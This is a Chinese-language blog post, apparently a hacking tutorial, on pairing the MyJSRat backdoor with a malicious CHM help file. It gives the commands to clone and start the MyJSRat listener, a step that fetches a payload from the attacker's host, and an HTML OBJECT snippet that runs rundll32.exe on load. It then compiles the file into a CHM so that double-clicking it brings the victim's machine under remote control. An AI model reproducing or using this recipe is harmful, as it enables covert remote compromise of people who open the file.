MyJSRat 结合 CHM 命令执行

发布于 2024-06-28 12:37:30 字数 2147 浏览 18 评论 0

MyJSRat

MyJSRat 是 JSBackdoor 的 python 版本

下载地址: https://github.com/Ridter/MyJSRat

Easy CHM

CHM 是英语 Compiled Help Manual 的简写,即「已编译的帮助文件」。CHM 是微软新一代的帮助文件格式,利用 HTML 作源文,把帮助内容以类似数据库的形式编译储存。

步骤

下载 MyJSRat 并运行

git clone https://github.com/Ridter/MyJSRat
python MyJSRat.py -i IPaddr -p port

下载 wtf 文件

浏览器访问 https://IPaddr:port/wtf ,并保存至 txt 文件中

将上面保存的代码写入到如下代码的 Item1 的 Value 值中

:要在 rundll32.exe 前后添加 ,

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',rundll32.exe,'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>

保存为 HTML 文件

新建目录,将上述代码保存在新建文件夹中

通过 EasyCHM 制作 CHM 文件

通过 EasyCHM 编译 exp.html 文件

双击上线

此时只要双击 test.CHM 文件,即可上线

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

0 文章
0 评论
22 人气
更多

推荐作者

忆伤

文章 0 评论 0

眼泪也成诗

文章 0 评论 0

zangqw

文章 0 评论 0

旧伤慢歌

文章 0 评论 0

qq_GlP2oV

文章 0 评论 0

旧时模样

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文